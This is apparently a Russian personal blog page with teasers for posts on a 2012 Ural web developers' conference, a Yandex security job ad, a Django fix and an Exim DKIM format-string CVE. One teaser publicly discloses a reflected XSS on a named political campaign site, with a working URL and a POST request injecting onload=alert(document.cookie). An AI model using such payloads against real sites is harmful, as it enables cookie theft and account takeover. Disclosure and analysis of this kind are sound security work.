UWDC 2012 конференция уральских веб-разработчиков - Как я побывал. День второй.

UWDC 2012 конференция уральских веб-разработчиков — Как я побывал. День второй.



UWDC 2012, Андрей Бешков (Microsoft) и Бабичев Игорь
Увеличить
Андрей Бешков (Microsoft)(Security Program Manager — «Руководитель программы информационной безопасности») и Бабичев Игорь
Ради этой фотки и стоило туда съездить.

Читать дальше

UWDC 2012 конференция уральских веб-разработчиков - Как я побывал. День первый.

UWDC 2012 конференция уральских веб-разработчиков



Вобщето я приехал туда послушать про стартапы, завести новые знакомства и поддержать старые. А также посидеть в компании людей, кто тебя понимает с полуслова.

А еще найти себе девушку, которая если бы не понимала, то хотя бы ценила то, что я делаю в своей работе. И нашел, так хотелось пойти и поцеловать, но сдержался. И спросил только ручку, но она мне отдала и левую и правую ручку. У неё не было колечка на руке. Я был в шоке, и хотел забрать всю её целиком прямиком в ЗАГС. ;)

Ну давайте немного о конференции в виде фоток, а не Love-story:

UWDC, UWDC 2012
UWDC 2012 конференция уральских веб-разработчиков
Читать дальше

Яндекс, Специалист по безопасности веб-приложений

Специалист по безопасности веб-приложений

В компанию «Яндекс» требуется специалист по безопасности веб-приложений.

Требования:



опыт работы в области информационной безопасности – от двух лет;

знания и базовый опыт администрирования Unix и Windows;

знание сетевых технологий и протоколов;

глубокое знание принципов построения и работы современных веб-приложений;

глубокое понимание типовых угроз и уязвимостей веб-приложений, в частности, перечисленных в OWASP Top 10;

владение навыками ручного и автоматизированного тестирования безопасности веб-приложений;

опыт программирования на скриптовых языках (Python).

Обязанности:



тестирование безопасности веб-приложений компании (тесты на проникновение, анализ кода);

участие в проектах по разработке веб-приложений в качестве эксперта по информационной безопасности;

взаимодействие с разработчиками и менеджерами сервисов для устранения обнаруженных уязвимостей;

предоставление экспертизы в области безопасного программирования;

проведение семинаров, участие в исследовательской работе.

Условия:


Работа в московском офисе Яндекса полный рабочий день.

Подробнее об условиях работы в Яндексе
Подробнее: company.yandex.ru/job/vacancies/web_application_security.xml

PS Придется продемонстрировать свои знания ;)
Читать дальше

Михаил Прохоров mdp2012.ru XSS

Я уважаю этого человека и он мой авторитет, но нельзя же так сайты выпускать.
Надо заботиться о информационной безопасности чуточку.

mdp2012.ru

Server:
nginx/1.0.11
Apache/1.3.42

http://mdp2012.ru/logon.html?back=/admin/%22%3E%%3CBODY%20onload=alert(document.cookie)%3E


POST http://mdp2012.ru:80/logon.html HTTP/1.1
Content-Length: 125
Content-Type: application/x-www-form-urlencoded
Cookie: _metrika_enabled=
Host: mdp2012.ru
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Opera/9.80 (X11; Linux i686; U; Debian; pl) Presto/2.9.168 Version/12.51
Accept: */*

action=logon&back=%22><BODY%20onload=alert(document.cookie)>&login=ignkgtnu&mode=common&passwd=acUn3t1x&remember_me=1

Читать дальше

Пассивная XSS в Яндекс.Деньгах

Яндекс, Деньги, два ствола XSS

История такая. На одном сайте увидел новость о том, что обновился сайт Мистера Фримена, решил заценить.

Зашёл на него и увидел там поле пожертвований Яндекс.Денег. По старой привычке бывалого скриптикидди вставил туда нетленные
[script]alert("")[/script] и нажал отправить:

Автор и продолжение.... habrahabr.ru/post/136531/
Читать дальше

Top 5 мероприятий по ИБ на ближайшее полугодие

  1. IV Межбанковская конференция " УРАЛЬСКИЙ ФОРУМ: ИНФОРМАЦИОННАЯ БЕЗОПАСНОСТЬ БАНКОВ " — 13-18 февраля — Магнитогорск
  2. РусКрипто — 28-31 марта — Москва
  3. Межотраслевой форум директоров по ИБ — 19-20 апреля — Москва
  4. Positive Hack Days — 30-31 мая — Москва
  5. IT & Security Forum — июнь — Казань.




  6. Еще парочка
  7. PCI DSS Russia — пройдет марта в Москве.
  8. IDC IT Security Roadshow в Москве
Читать дальше

NameError: name 'os' is not defined

root@vm6504:/home/web/proj# python manage.py runserver
Traceback (most recent call last):
  File "manage.py", line 11, in <module>
    import settings
  File "/home/web/proj/settings.py", line 59, in <module>
    STATIC_ROOT = os.path.abspath(os.path.join(os.path.dirname(__file__), '../st                                                                                        atic/example'))
NameError: name 'os' is not defined


Надо дописать в /home/web/proj/settings.py
строчку: import os
Читать дальше

Generating The Web

Чтобы добавить словари в Generating The Web, надо скачать базу синонимов с www.webloganalyzer.biz/syn.zip
Открываем AllSubmitter
  1. сверху в меню «Справочники->База синонимов»
  2. внизу слева «Импорт/Экспорт» выбираем «Экспорт *.assyn» и добавляем скачанные словари русского языка.
  3. там же выбираем «Импорт в *.txt», и выгружаем базу словарей для Generating The Web

Заходим в Generating The Web
  1. сверу в меню «Синонимы-> Словари»
  2. добавляем наш выгруженные *.txt фаил
  3. Профит! Удачной работы!
Читать дальше

CVE-2011-1764: Уязвимость Exim DKIM Signatures Remote Format String

Пару минут назад я заметил, этот твит Джошуа Дж. Дрейк (ака jduck). Это действительно интересная уязвимость Exim MTA. Так что, как мы можем прочитать в отчете об ошибке, проблема о которой сообщил Джон Р. Левин, как неправильное толкование DKIM подписи. Более пристальный взгляд в src/dkim.c показывает, что это был классическая уязвимость форматной строки.

void dkim_exim_verify_finish(void) {
   pdkim_signature *sig = NULL;
   int dkim_signers_size = 0;
   int dkim_signers_ptr = 0;
   dkim_signers = NULL;
 
   /* Delete eventual previous signature chain */
   dkim_signatures = NULL;
 ...
     /* Log a line for each signature */
     uschar *logmsg = string_append(NULL, &size, &ptr, 5,
 
      string_sprintf( "DKIM: d=%s s=%s c=%s/%s a=%s ",
                      sig->domain,
                      sig->selector,
                      (sig->canon_headers == PDKIM_CANON_SIMPLE)?"simple":"relaxed",
                      (sig->canon_body    == PDKIM_CANON_SIMPLE)?"simple":"relaxed",
                      (sig->algo          == PDKIM_ALGO_RSA_SHA256)?"rsa-sha256":"rsa-sha1"
                    ),
 ...
    logmsg[ptr] = '\0';
    log_write(0, LOG_MAIN, (char *)logmsg);
 ...
  }
}

Как вы можете ясно видеть, буфер (logmsg) передается log_write() получается из (partially) контролируемой пользователем данных. Поскольку не существует спецификатора форматной строки в log_write(), пользователь получает возможность инициировать общюю уязвимость форматной строки с использованием таких указателей. Исправление было совершенно очевидно…

-    log_write(0, LOG_MAIN, (char *)logmsg);
+    log_write(0, LOG_MAIN, "DKIM: %s", logmsg);


Кроме того, поскольку «DKIM:» строка была перенесена в log_write() он был удален из исходного string_sprint(), показанный ранее…
-      string_sprintf( "DKIM: d=%s s=%s c=%s/%s a=%s ",
+      string_sprintf( "d=%s s=%s c=%s/%s a=%s ",


6 мая, 2011 года
перевод гуглом с xorl.wordpress.com/2011/05/06/exim-dkim-signatures-remote-format-string/
Читать дальше